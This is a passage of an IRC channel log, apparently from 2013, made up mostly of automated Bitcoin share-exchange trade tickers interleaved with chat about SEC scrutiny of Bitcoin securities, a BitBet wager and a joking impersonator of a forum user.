0.018 BTC [-] Jul 25 04:00:56 [BTCTC] [AMC-PT] 2 @ 0.003551 = 0.0071 BTC [-] Jul 25 04:00:58 [BTCTC] [AMC-PT] 452 @ 0.00355 = 1.6046 BTC [-] Jul 25 04:01:45 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.003429 = 0.0171 BTC [+] Jul 25 04:02:32 [HAVELOCK] [SDSTM] 107 @ 0.01084 = 1.1599 BTC [+] Jul 25 04:04:37 [BTCT:BITVPS] 1D: 0.00165 / 0.00182 / 0.002195 (8563 shares, 15.6 BTC), 7D: 0.00165 / 0.00186 / 0.002472 (16041 shares, 29.9 BTC), 30D: 0.00089 / 0.00168 / 0.0035 (65184 shares, 109.4 BTC) Jul 25 04:06:50 [BTCTC] [GSDPT] 50 @ 0.00335 = 0.1675 BTC [-] Jul 25 04:07:32 [BTCTC] [BITVPS] 1 @ 0.0019 BTC [+] Jul 25 04:07:34 [BTCTC] [TAT.ASICMINER] 5 @ 0.045 = 0.225 BTC [+] Jul 25 04:07:35 [BTCTC] [BITVPS] 450 @ 0.001662 = 0.7479 BTC [-] Jul 25 04:08:39 [BTCTC] [BTC-TRADING-PT] 19 @ 0.8025 = 15.2475 BTC [-] Jul 25 04:09:07 [BTCTC] [BITVPS] 500 @ 0.001661 = 0.8305 BTC [-] Jul 25 04:09:11 [BTCTC] [BITVPS] 1900 @ 0.00166 = 3.154 BTC [-] Jul 25 04:09:13 [BTCTC] [BITVPS] 2655 @ 0.00165 = 4.3808 BTC [-] Jul 25 04:09:53 [BTCTC] [RSM] 10 @ 0.0166 = 0.166 BTC [+] Jul 25 04:12:52 [BTCTC] [BASIC-MINING] 1 @ 0.5152 BTC [+] Jul 25 04:12:55 [BTCTC] [AMC-PT] 20 @ 0.00353 = 0.0706 BTC [-] Jul 25 04:12:57 [BTCTC] [AMC-PT] 130 @ 0.0035 = 0.455 BTC [-] Jul 25 04:18:37 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003351 = 0.0335 BTC [-] Jul 25 04:20:13 [HAVELOCK] [AM100] 5 @ 0.0433 = 0.2165 BTC [+] Jul 25 04:20:30 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003371 = 0.0337 BTC [+] Jul 25 04:20:30 [HAVELOCK] [AM100] 11 @ 0.0433 = 0.4763 BTC [+] Jul 25 04:21:31 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003371 = 0.0337 BTC [+] Jul 25 04:21:33 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00337 BTC [-] Jul 25 04:21:54 [HAVELOCK] [AM100] 6 @ 0.0433 = 0.2598 BTC [+] Jul 25 04:23:50 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003371 = 0.0337 BTC [+] Jul 25 04:25:24 [BTCTC] [KENILWORTH] 50 @ 0.0018 = 0.09 BTC [-] Jul 25 04:26:02 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003371 = 0.0337 BTC [+] Jul 25 04:26:39 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003371 = 0.0337 BTC [+] Jul 25 04:27:05 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003371 = 0.0337 BTC [+] Jul 25 04:27:30 [HAVELOCK] [AM100] 7 @ 0.04335001 = 0.3035 BTC [+] Jul 25 04:27:32 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003371 = 0.0337 BTC [+] Jul 25 04:27:56 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003371 = 0.0337 BTC [+] Jul 25 04:29:31 [HAVELOCK] [AM100] 50 @ 0.04335 = 2.1675 BTC [-] Jul 25 04:29:49 [HAVELOCK] [AM100] 20 @ 0.04335001 = 0.867 BTC [+] Jul 25 04:31:34 [BTCTC] [TAT.ASICMINER] 2 @ 0.045 = 0.09 BTC [+] Jul 25 04:31:55 [BTCTC] [TAT.ASICMINER] 46 @ 0.045 = 2.07 BTC [+] Jul 25 04:34:18 [HAVELOCK] [SDSTM] 2 @ 0.01084 = 0.0217 BTC [+] Jul 25 04:36:30 [BTCTC] [GSDPT] 14 @ 0.00335 = 0.0469 BTC [-] Jul 25 04:39:07 [HAVELOCK] [AM100] 1 @ 0.04379987 BTC [+] Jul 25 04:39:15 [BTCTC] [DMS.MINING] 4 @ 0.014 = 0.056 BTC [-] Jul 25 04:41:08 ;;nethash Jul 25 04:41:08 237593.848071 Jul 25 04:41:14 ;;bcstats Jul 25 04:41:17 Current Blocks: 248310 | Current Difficulty: 3.125696072776893E7 | Next Difficulty At Block: 249983 | Next Difficulty In: 1673 blocks | Next Difficulty In About: 1 week, 3 days, 19 hours, 2 minutes, and 42 seconds | Next Difficulty Estimate: 32104851.5362 | Estimated Percent Change: 2.71265 Jul 25 04:42:21 [HAVELOCK] [AM100] 2 @ 0.04379987 = 0.0876 BTC [+] Jul 25 04:43:46 [BTCTC] [TAT.ASICMINER] 2 @ 0.04549 = 0.091 BTC [+] Jul 25 04:44:54 http://www.reddit.com/r/CoinChat/comments/1izeya/my_name_is_tradefartress_and_i_run_coinchat_ama/ Twitter: @TradeFartress Jul 25 04:44:56 My name is TradeFartress, and I run CoinChat. AMA : CoinChat Jul 25 04:45:03 [BTCTC] [TAT.ASICMINER] 5 @ 0.0455 = 0.2275 BTC [+] Jul 25 04:46:02 [BTCTC] [TAT.ASICMINER] 12 @ 0.04579 = 0.5495 BTC [+] Jul 25 04:46:37 [BTCTC] [TAT.MINIGAME] 750 @ 0.00027 = 0.2025 BTC [+] Jul 25 04:47:07 [BTCTC] [TAT.ASICMINER] 3 @ 0.04579 = 0.1374 BTC [+] Jul 25 04:47:25 q. who cares? Jul 25 04:47:59 [BTCTC] [AMC-PT] 2 @ 0.003599 = 0.0072 BTC [+] Jul 25 04:48:01 [BTCTC] [AMC-PT] 3000 @ 0.0036 = 10.8 BTC [+] Jul 25 04:48:02 http://bitbet.us/bet/486/james-gibson-aka-gigavps-to-be-named-as/ Jul 25 04:48:02 [BTCTC] [AMC-PT] 2500 @ 0.00365 = 9.125 BTC [+] Jul 25 04:48:04 [BTCTC] [AMC-PT] 96 @ 0.003698 = 0.355 BTC [+] Jul 25 04:48:06 [BTCTC] [AMC-PT] 5 @ 0.003699 = 0.0185 BTC [+] Jul 25 04:48:07 BitBet - James Gibson aka gigavps to be named as Pirate ponzi scheme fraudulent beneficiary Jul 25 04:48:07 [BTCTC] [AMC-PT] 194 @ 0.003701 = 0.718 BTC [+] Jul 25 04:48:07 apparently nobody wants any action huh Jul 25 04:48:09 [BTCTC] [AMC-PT] 1000 @ 0.003779 = 3.779 BTC [+] Jul 25 04:48:09 [BTCTC] [AMC-PT] 3194 @ 0.00378 = 12.0733 BTC [+] Jul 25 04:48:10 [BTCTC] [AMC-PT] 25 @ 0.003788 = 0.0947 BTC [+] Jul 25 04:48:11 [BTCTC] [AMC-PT] 2884 @ 0.00379 = 10.9304 BTC [+] Jul 25 04:48:30 [BTCTC] [GSDPT] 10 @ 0.00335 = 0.0335 BTC [-] Jul 25 04:48:50 mircea_popescu: I want some action, whatcha got? Jul 25 04:48:56 see link. Jul 25 04:49:52 also, your reddit ama did a lot worse than my sa ama. Jul 25 04:49:59 Yeah! That's a good one. Jul 25 04:50:12 [BTCTC] [COGNITIVE] 1 @ 0.535 BTC [+] Jul 25 04:50:26 I know. :( Apparently no one likes the TradeFartress Jul 25 04:50:32 a well. Jul 25 04:50:38 because its not obvious why someone would bother trolling tradefortress, note this is not him Jul 25 04:50:54 dub how do you know ? Jul 25 04:50:59 i was kinda leaning that way. Jul 25 04:51:10 I'm psychic Jul 25 04:51:17 I am the real one Jul 25 04:51:49 TradeFartress so are you one of the butthuert ripple investors ? or / Jul 25 04:52:14 Ripple Investors? I scammed all them bitches out of Ripples Jul 25 04:52:37 [BTCTC] [DMS.SELLING] 27 @ 0.01998 = 0.5395 BTC [+] Jul 25 04:53:10 ic Jul 25 04:53:28 [BTCTC] [ASICMINER-PT] 1 @ 4.66 BTC [+] Jul 25 04:54:14 re: giga I liked the theory that any potential conspirators would be turned into witnesses Jul 25 04:54:27 [BTCTC] [COGNITIVE] 1 @ 0.535 BTC [+] Jul 25 04:54:29 tis 'murica and all Jul 25 04:54:37 FUCK YEA! Jul 25 04:54:39 mp, your bet is tl;tr Jul 25 04:54:55 I've seen enough CSI to know they'll prolly 'turn states' Jul 25 04:55:01 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003431 = 0.0069 BTC [+] Jul 25 04:55:02 there's always tradefortress drama in the scam accusations forum, usually good for a laugh Jul 25 04:55:13 [BTCTC] [AMC-PT] 200 @ 0.00375 = 0.75 BTC [-] Jul 25 04:55:43 let me rephrase Jul 25 04:55:49 who is gigavps? Jul 25 04:56:06 lurk moar Jul 25 04:56:09 @Duffer that TradeFortress guy is impersonating me ... No one can scam like me Jul 25 04:56:27 [HAVELOCK] [AM100] 25 @ 0.0427 = 1.0675 BTC [-] Jul 25 04:57:18 [BTCTC] [DMS.SELLING] 9 @ 0.01998 = 0.1798 BTC [+] Jul 25 04:57:31 [BTCTC] [DMS.SELLING] 17 @ 0.01998 = 0.3397 BTC [+] Jul 25 04:57:38 [BTCTC] [TAT.MINIGAME] 200 @ 0.00027 = 0.054 BTC [+] Jul 25 04:59:20 [HAVELOCK] [AM100] 2 @ 0.04379987 = 0.0876 BTC [+] Jul 25 04:59:23 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003342 = 0.0334 BTC [-] Jul 25 04:59:40 TradeFortress told me to offer start offering a 7%/week investment scheme during a busy #bitcoin-otc with no ops ... pffft. I can do better Jul 25 05:00:44 [BTCTC] [TAT.MINIGAME] 1540 @ 0.00027 = 0.4158 BTC [+] Jul 25 05:00:49 [BTCTC] [ASICMINER-PT] 3 @ 4.615 = 13.845 BTC [-] Jul 25 05:01:00 theres no self respect left in the trolling game Jul 25 05:06:13 byMideowas yeah. and p[eople still comment that it's "unclear" Jul 25 05:06:31 for every person with a bitcoin there's about 50 with an idea at at least 5000 that know better. Jul 25 05:07:57 dub witness as to what exactly. Jul 25 05:08:33 [BTCTC] [AMC-PT] 1300 @ 0.00375 = 4.875 BTC [-] Jul 25 05:08:34 how trendon likes his steak Jul 25 05:08:35 [BTCTC] [AMC-PT] 220 @ 0.00379 = 0.8338 BTC [+] Jul 25 05:08:36 [BTCTC] [AMC-PT] 100 @ 0.003794 = 0.3794 BTC [+] Jul 25 05:08:39 [BTCTC] [AMC-PT] 1381 @ 0.003794 = 5.2395 BTC [+] Jul 25 05:08:41 [BTCTC] [AMC-PT] 1000 @ 0.003795 = 3.795 BTC [+] Jul 25 05:08:43 [BTCTC] [AMC-PT] 300 @ 0.003799 = 1.1397 BTC [+] Jul 25 05:08:43 [BTCTC] [AMC-PT] 250 @ 0.003799 = 0.9498 BTC [+] Jul 25 05:08:45 [BTCTC] [AMC-PT] 2999 @ 0.0038 = 11.3962 BTC [+] Jul 25 05:08:46 [BTCTC] [AMC-PT] 67 @ 0.0038 = 0.2546 BTC [+] Jul 25 05:08:48 [BTCTC] [AMC-PT] 383 @ 0.0038 = 1.4554 BTC [+] Jul 25 05:09:08 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0031 = 0.031 BTC [-] Jul 25 05:09:21 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [-] Jul 25 05:09:40 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0031 = 0.031 BTC [-] Jul 25 05:09:43 so what's your take? sounds like your thinking the btc community/share community will get screwed over this sec incident.. Jul 25 05:09:51 [BTCTC] [AMC-PT] 12 @ 0.00375 = 0.045 BTC [-] Jul 25 05:10:01 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0031 = 0.031 BTC [-] Jul 25 05:10:29 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0031 = 0.031 BTC [-] Jul 25 05:10:53 it does ?! Jul 25 05:10:55 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0031 = 0.031 BTC [-] Jul 25 05:11:28 [BTCTC] [ASICMINER-PT] 2 @ 4.6 = 9.2 BTC [-] Jul 25 05:11:33 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0031 = 0.031 BTC [-] Jul 25 05:11:55 [BTCTC] [AMC-PT] 165 @ 0.0038 = 0.627 BTC [+] Jul 25 05:12:14 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0031 = 0.031 BTC [-] Jul 25 05:12:33 it does sound like this or the community gets screwed? Jul 25 05:12:33 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0031 = 0.031 BTC [-] Jul 25 05:12:47 let's put on a tinfoilhat Jul 25 05:12:51 theymos is an informant Jul 25 05:12:56 [BTCTC] [AMC-PT] 452 @ 0.0038 = 1.7176 BTC [+] Jul 25 05:13:03 share issuers get crazy over this Jul 25 05:13:10 share prices crash Jul 25 05:13:12 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0031 = 0.031 BTC [-] Jul 25 05:13:27 is this, what you think? Jul 25 05:13:28 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0031 = 0.031 BTC [-] Jul 25 05:13:50 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0031 = 0.031 BTC [-] Jul 25 05:13:56 [BTCTC] [AMC-PT] 3000 @ 0.003848 = 11.544 BTC [+] Jul 25 05:13:58 [BTCTC] [DMS.MINING] 6 @ 0.014 = 0.084 BTC [-] Jul 25 05:14:12 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0031 = 0.031 BTC [-] Jul 25 05:14:45 i'm sure it's not. but i honor your opinion and that's why i'd like to hear more :) Jul 25 05:16:06 [BTCTC] [AMC-PT] 16 @ 0.003848 = 0.0616 BTC [+] Jul 25 05:16:06 [BTCTC] [DMS.MINING] 1 @ 0.014 BTC [-] Jul 25 05:16:06 [BTCTC] [ASICMINER-PT] 1 @ 4.602 BTC [+] Jul 25 05:16:18 Isn't it the same old 'weak hands' bit? Jul 25 05:16:31 [BTCTC] [ASICMINER-PT] 1 @ 4.605 BTC [+] Jul 25 05:16:34 [BTCTC] [TAT.ASICMINER] 2 @ 0.04579 = 0.0916 BTC [+] Jul 25 05:16:39 [BTCTC] [BASIC-MINING] 2 @ 0.476 = 0.952 BTC [-] Jul 25 05:17:28 [BTCTC] [TAT.ASICMINER] 2 @ 0.04579 = 0.0916 BTC [+] Jul 25 05:17:32 byMideowas were you talking to me ? i totally imagined half the convo is on my ignore list. Jul 25 05:19:20 [BTCTC] [TAT.ASICMINER] 25 @ 0.04533 = 1.1333 BTC [-] Jul 25 05:19:38 well yea, but anyone should feel free to participate Jul 25 05:20:20 mjoiii: i think so, too. "strong hands" will profit. Jul 25 05:21:07 [BTCTC] [ASICMINER-PT] 1 @ 4.587 BTC [-] Jul 25 05:21:28 [BTCTC] [AMC-PT] 100 @ 0.003837 = 0.3837 BTC [-] Jul 25 05:21:41 Meaning it seems odd that anyone could be shocked that we'd run into the sec at some point. Jul 25 05:22:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.04533 BTC [-] Jul 25 05:22:09 [BTCTC] [AMC-PT] 200 @ 0.00375 = 0.75 BTC [-] Jul 25 05:22:12 [BTCTC] [BASIC-MINING] 7 @ 0.475 = 3.325 BTC [-] Jul 25 05:22:23 [BTCTC] [TAT.ASICMINER] 8 @ 0.04533 = 0.3626 BTC [-] Jul 25 05:22:32 true Jul 25 05:22:50 i don't think it will come to anything really though Jul 25 05:22:55 at least not for a while Jul 25 05:23:20 I took it as a positive. Sec looking out for BTC investors. Jul 25 05:23:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.04579 BTC [+] Jul 25 05:23:30 [BTCTC] [BASIC-MINING] 1 @ 0.475 BTC [-] Jul 25 05:23:34 offers will still be made but posted as pass-throughs on various exchanges that will do business with US investors Jul 25 05:23:35 Almost an endorsement. Jul 25 05:23:52 you're right i agree Jul 25 05:24:06 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [+] Jul 25 05:24:53 [BTCTC] [AMC-PT] 31 @ 0.0037 = 0.1147 BTC [-] Jul 25 05:24:55 [BTCTC] [AMC-PT] 169 @ 0.003602 = 0.6087 BTC [-] Jul 25 05:25:34 [BTCTC] [AMC-PT] 100 @ 0.003701 = 0.3701 BTC [+] Jul 25 05:25:35 Anyway was the first potential scare, and interesting to see how various community members took it. Jul 25 05:26:09 Some terrified, some planning workarounds, it's healthy overall to shake things up a bit. Jul 25 05:26:20 its te first scare if you don't count the other ones Jul 25 05:26:43 lol Jul 25 05:26:54 [BTCTC] [TAT.ASICMINER] 3 @ 0.04579 = 0.1374 BTC [+] Jul 25 05:26:59 [HAVELOCK] [HIM] 5 @ 0.249999 = 1.25 BTC [-] Jul 25 05:27:16 newbs get spooked, its the nature of newness Jul 25 05:27:51 Well, yeah, but attention on unlicensed securities seems like it could really count. Jul 25 05:28:09 its not the first of that Jul 25 05:28:18 Amazing we came this far without that ever being tested. Jul 25 05:28:24 it hasnt Jul 25 05:28:26 Oh? Jul 25 05:28:38 glbse Jul 25 05:28:47 [BTCTC] [AMC-PT] 1000 @ 0.00365 = 3.65 BTC [-] Jul 25 05:28:55 Had attention from regulators? Jul 25 05:29:02 oh Jul 25 05:29:05 [BTCTC] [ASICMINER-PT] 1 @ 4.593 BTC [-] Jul 25 05:29:17 [BTCTC] [TAT.ASICMINER] 12 @ 0.04533 = 0.544 BTC [-] Jul 25 05:29:18 supposedly Jul 25 05:30:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.04579 BTC [+] Jul 25 05:30:46 [BTCTC] [AMC-PT] 100 @ 0.003651 = 0.3651 BTC [+] Jul 25 05:31:07 Anyway was the first potential scare << no, it wasn't. Jul 25 05:31:27 look up the forum for "bitcoin doesn't care about the sec" signatures from back last oct. Jul 25 05:31:30 [BTCTC] [BASIC-MINING] 1 @ 0.45 BTC [-] Jul 25 05:31:32 [BTCTC] [BASIC-MINING] 1 @ 0.4301 BTC [-] Jul 25 05:31:34 [BTCTC] [BASIC-MINING] 2 @ 0.43 = 0.86 BTC [-] Jul 25 05:31:36 [BTCTC] [BASIC-MINING] 1 @ 0.43 BTC [-] Jul 25 05:31:37 [BTCTC] [BASIC-MINING] 1 @ 0.422 BTC [-] Jul 25 05:31:38 [BTCTC] [BASIC-MINING] 11 @ 0.421 = 4.631 BTC [-] Jul 25 05:31:39 [BTCTC] [BASIC-MINING] 3 @ 0.4 = 1.2 BTC [-] Jul 25 05:32:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.04579 BTC [+] Jul 25 05:32:39 [BTCTC] [ASICMINER-PT] 1 @ 4.668 BTC [+] Jul 25 05:32:48 https://bitcointalk.org/index.php?topic=115693.0 such as. Jul 25 05:33:05 [BTCTC] [AMC-PT] 25 @ 0.00365 = 0.0913 BTC [-] Jul 25 05:33:06 Let's have a little fun then, shall we. Jul 25 05:34:11 Ha! Nice Jul 25 05:34:31 [BTCTC] [ASICMINER-PT] 1 @ 4.669 BTC [+] Jul 25 05:35:02 [BTCTC] [TAT.MINIGAME] 50 @ 0.0002999 = 0.015 BTC [+] Jul 25 05:35:04 [BTCTC] [TAT.MINIGAME] 200 @ 0.0003 = 0.06 BTC [+] Jul 25 05:35:05 [BTCTC] [TAT.MINIGAME] 52 @ 0.000302 = 0.0157 BTC [+] Jul 25 05:35:07 [BTCTC] [TAT.MINIGAME] 130 @ 0.000354 = 0.046 BTC [+] Jul 25 05:35:08 [BTCTC] [TAT.MINIGAME] 70 @ 0.000354 = 0.0248 BTC [+] Jul 25 05:35:32 [BTCTC] [TAT.MINIGAME] 400 @ 0.0003549 = 0.142 BTC [+] Jul 25 05:37:22 [MPEX] [S.MG] 52000 @ 0.00025 = 13 BTC [-] Jul 25 05:37:29 [BTCTC] [TAT.ASICMINER] 5 @ 0.04579 = 0.229 BTC [+] Jul 25 05:37:31 [HAVELOCK] [SMG] 92 @ 0.00027999 = 0.0258 BTC [+] Jul 25 05:37:33 [BTCTC] [TAT.ASICMINER] 5 @ 0.0458 = 0.229 BTC [+] Jul 25 05:38:07 [MPEX] [S.MG] 20647 @ 0.00025 = 5.1618 BTC [-] Jul 25 05:40:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.04579 = 0.0916 BTC [-] Jul 25 05:40:33 [BTCTC] [TAT.ASICMINER] 5 @ 0.0458 = 0.229 BTC [+] Jul 25 05:41:10 [BTCTC] [AMC-PT] 50 @ 0.003749 = 0.1875 BTC [+] Jul 25 05:44:10 [HAVELOCK] [AM100] 10 @ 0.043 = 0.43 BTC [-] Jul 25 05:44:29 [BTCTC] [S.MPOE-PT] 99 @ 0.000934 = 0.0925 BTC [+] Jul 25 05:45:39 [MPEX] [S.MG] 146400 @ 0.0002595 = 37.9908 BTC [+] Jul 25 05:46:26 [BTCTC] [DMS.SELLING] 1 @ 0.0202 BTC [+] Jul 25 05:46:45 [BTCTC] [DMS.SELLING] 6 @ 0.0185 = 0.111 BTC [-] Jul 25 05:47:44 [HAVELOCK] [AM100] 22 @ 0.04261 = 0.9374 BTC [-] Jul 25 05:48:02 [MPEX] [S.MG] 3000 @ 0.0002595 = 0.7785 BTC [+] Jul 25 05:49:44 [HAVELOCK] [HIM] 5 @ 0.249999 = 1.25 BTC [-] Jul 25 05:50:47 [HAVELOCK] [AM100] 3 @ 0.04379986 = 0.1314 BTC [+] Jul 25 05:52:07 [BTCTC] [AMC-PT] 8 @ 0.003661 = 0.0293 BTC [-] Jul 25 05:52:09 [BTCTC] [AMC-PT] 16 @ 0.00366 = 0.0586 BTC [-] Jul 25 05:52:10 [BTCTC] [AMC-PT] 32 @ 0.003651 = 0.1168 BTC [-] Jul 25 05:52:40 [BTCTC] [AMC-PT] 65 @ 0.00365 = 0.2373 BTC [-] Jul 25 05:53:05 [BTCTC] [AMC-PT] 3 @ 0.00362 = 0.0109 BTC [-] Jul 25 05:55:38 [BTCTC] [KENILWORTH] 30 @ 0.0018 = 0.054 BTC [-] Jul 25 05:55:49 [BTCTC] [ASICMINER-PT] 1 @ 4.612 BTC [-] Jul 25 05:56:02 [BTCTC] [DMS.MINING] 1 @ 0.01414 BTC [+] Jul 25 05:57:54 [MPEX] [S.MG] 22500 @ 0.000265 = 5.9625 BTC [+] Jul 25 05:59:56 [BTCTC] [KENILWORTH] 550 @ 0.0018 = 0.99 BTC [-] Jul 25 06:01:12 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003351 = 0.0335 BTC [+] Jul 25 06:02:03 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003351 = 0.0335 BTC [+] Jul 25 06:02:45 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003351 = 0.0335 BTC [+] Jul 25 06:03:08 [BTCTC] [TAT.MINIGAME] 1 @ 0.000276 BTC [-] Jul 25 06:03:10 [BTCTC] [TAT.MINIGAME] 100 @ 0.000275 = 0.0275 BTC [-] Jul 25 06:03:14 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003351 = 0.0335 BTC [+] Jul 25 06:03:29 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003351 = 0.0335 BTC [+] Jul 25 06:04:07 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003351 = 0.0335 BTC [+] Jul 25 06:04:34 [BTCTC] [BASIC-MINING] 1 @ 0.4 BTC [-] Jul 25 06:04:36 [BTCTC] [BASIC-MINING] 1 @ 0.3997 BTC [-] Jul 25 06:04:38 [BTCTC] [BASIC-MINING] 4 @ 0.3811 = 1.5244 BTC [-] Jul 25 06:04:39 [BTCTC] [BASIC-MINING] 3 @ 0.3811 = 1.1433 BTC [-] Jul 25 06:04:41 [BTCTC] [BASIC-MINING] 5 @ 0.3805 = 1.9025 BTC [-] Jul 25 06:04:42 [BTCTC] [BASIC-MINING] 5 @ 0.35 = 1.75 BTC [-] Jul 25 06:04:44 [BTCTC] [BASIC-MINING] 1 @ 0.321 BTC [-] Jul 25 06:05:08 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003362 = 0.0336 BTC [+] Jul 25 06:05:48 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003362 = 0.0336 BTC [+] Jul 25 06:06:31 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003362 = 0.0336 BTC [+] Jul 25 06:06:49 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003362 = 0.0336 BTC [+] Jul 25 06:06:50 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003361 BTC [-] Jul 25 06:06:52 [BTCTC] [TAT.VIRTUALMINE] 132 @ 0.003031 = 0.4001 BTC [-] Jul 25 06:07:22 Thanks for the link MP, good reminder. This is what disruption is all about after all. Jul 25 06:12:30 [BTCTC] [AMC-PT] 2 @ 0.003749 = 0.0075 BTC [+] Jul 25 06:13:33 wow basic-mining half off Jul 25 06:13:35 today only Jul 25 06:13:43 [BTCTC] [DMS.SELLING] 14 @ 0.0185 = 0.259 BTC [-] Jul 25 06:15:18 lowest low 0.13 Jul 25 06:15:23 it's crazy almost Jul 25 06:15:53 ya saw earlier today as it happened /wish i had free capital Jul 25 06:16:12 Might be an option, with unknown premium Jul 25 06:16:22 [HAVELOCK] [AM100] 90 @ 0.0437993 = 3.9419 BTC [-] Jul 25 06:16:24 Might have been less or have been purchased a long while ago Jul 25 06:16:36 I mean more Jul 25 06:16:39 With premium Jul 25 06:16:44 nope, no options Jul 25 06:16:47 [HAVELOCK] [AM100] 5 @ 0.0437993 = 0.219 BTC [-] Jul 25 06:16:54 it would be visible in the trade history Jul 25 06:17:13 hi namworld Jul 25 06:17:42 Hey there Jul 25 06:18:01 [HAVELOCK] [AM100] 47 @ 0.0437993 = 2.0586 BTC [-] Jul 25 06:18:31 [HAVELOCK] [AM100] 4 @ 0.0437998 = 0.1752 BTC [+] Jul 25 06:19:22 [HAVELOCK] [AM100] 20 @ 0.0437998 = 0.876 BTC [+] Jul 25 06:21:06 [HAVELOCK] [AM100] 20 @ 0.0437998 = 0.876 BTC [+] Jul 25 06:21:25 [HAVELOCK] [AM100] 2 @ 0.0437998 = 0.0876 BTC [+] Jul 25 06:21:52 [HAVELOCK] [AM100] 1 @ 0.0437998 BTC [+] Jul 25 06:23:10 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003351 = 0.0335 BTC [+] Jul 25 06:23:42 [BTCTC] [BASIC-MINING] 1 @ 0.4995 BTC [+] Jul 25 06:27:54 [MPEX] [S.MPOE] 12100 @ 0.00080179 = 9.7017 BTC [+] Jul 25 06:27:56 [MPEX] [S.MPOE] 4700 @ 0.00080209 = 3.7698 BTC [+] Jul 25 06:28:11 [MPEX] [S.MPOE] 400 @ 0.00080404 = 0.3216 BTC [+] Jul 25 06:34:57 [HAVELOCK] [SMG] 5 @ 0.00028 = 0.0014 BTC [+] Jul 25 06:34:59 [BTCTC] [BMF] 10 @ 0.032 = 0.32 BTC [-] Jul 25 06:35:52 [BTCTC] [TAT.ASICMINER] 8 @ 0.04551 = 0.3641 BTC [-] Jul 25 06:36:31 [BTCTC] [BMF] 13 @ 0.032 = 0.416 BTC [-] Jul 25 06:37:09 [BTCTC] [FIMB] 5 @ 0.01003 = 0.0502 BTC [-] Jul 25 06:37:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.04551 = 0.091 BTC [-] Jul 25 06:37:53 [BTCTC] [TAT.ASICMINER] 11 @ 0.04551 = 0.5006 BTC [-] Jul 25 06:38:14 [BTCTC] [TAT.ASICMINER] 4 @ 0.0455 = 0.182 BTC [-] Jul 25 06:41:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.04569 BTC [+] Jul 25 06:42:26 [BTCTC] [AMC-PT] 23 @ 0.003749 = 0.0862 BTC [+] Jul 25 06:42:34 [BTCTC] [COGNITIVE] 2 @ 0.61 = 1.22 BTC [+] Jul 25 06:42:36 [BTCTC] [COGNITIVE] 1 @ 0.61 BTC [+] Jul 25 06:42:37 [BTCTC] [COGNITIVE] 1 @ 0.61 BTC [+] Jul 25 06:44:55 [MPEX] [S.MPOE] 7084 @ 0.00079942 = 5.6631 BTC [-] Jul 25 06:47:23 [BTCTC] [AMC-PT] 112 @ 0.003749 = 0.4199 BTC [+] Jul 25 06:49:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.04569 = 0.4569 BTC [+] Jul 25 06:49:45 [BTCTC] [CRYPTO-TRADE] 30 @ 0.199 = 5.97 BTC [+] Jul 25 06:50:38 [BTCTC] [TAT.ASICMINER] 15 @ 0.0457 = 0.6855 BTC [+] Jul 25 06:53:48 [HAVELOCK] [SDSTM] 2 @ 0.01083 = 0.0217 BTC [-] Jul 25 06:57:50 [BTCTC] [GSDPT] 5 @ 0.00335 = 0.0168 BTC [-] Jul 25 06:57:51 [BTCTC] [AMC-PT] 500 @ 0.00375 = 1.875 BTC [+] Jul 25 06:57:52 [BTCTC] [AMC-PT] 900 @ 0.00378 = 3.402 BTC [+] Jul 25 06:57:54 [BTCTC] [AMC-PT] 840 @ 0.00379 = 3.1836 BTC [+] Jul 25 07:03:22 [MPEX] [S.MPOE] 12850 @ 0.00079646 = 10.2345 BTC [-] Jul 25 07:04:50 [HAVELOCK] [SDSTM] 2 @ 0.01083 = 0.0217 BTC [-] Jul 25 07:04:53 [BTCTC] [ASICMINER-PT] 1 @ 4.611 BTC [-] Jul 25 07:04:53 Hello guys, what's the latest news on btct? Jul 25 07:04:54 [BTCTC] [ASICMINER-PT] 1 @ 4.61 BTC [-] Jul 25 07:05:01 I heard there's some weird stuff going on Jul 25 07:05:05 [HAVELOCK] [SDSTM] 1 @ 0.01083 BTC [-] Jul 25 07:07:20 news is the owner got loose with his words and spooked some people, then realized he should take a break and calm down Jul 25 07:07:25 if that's 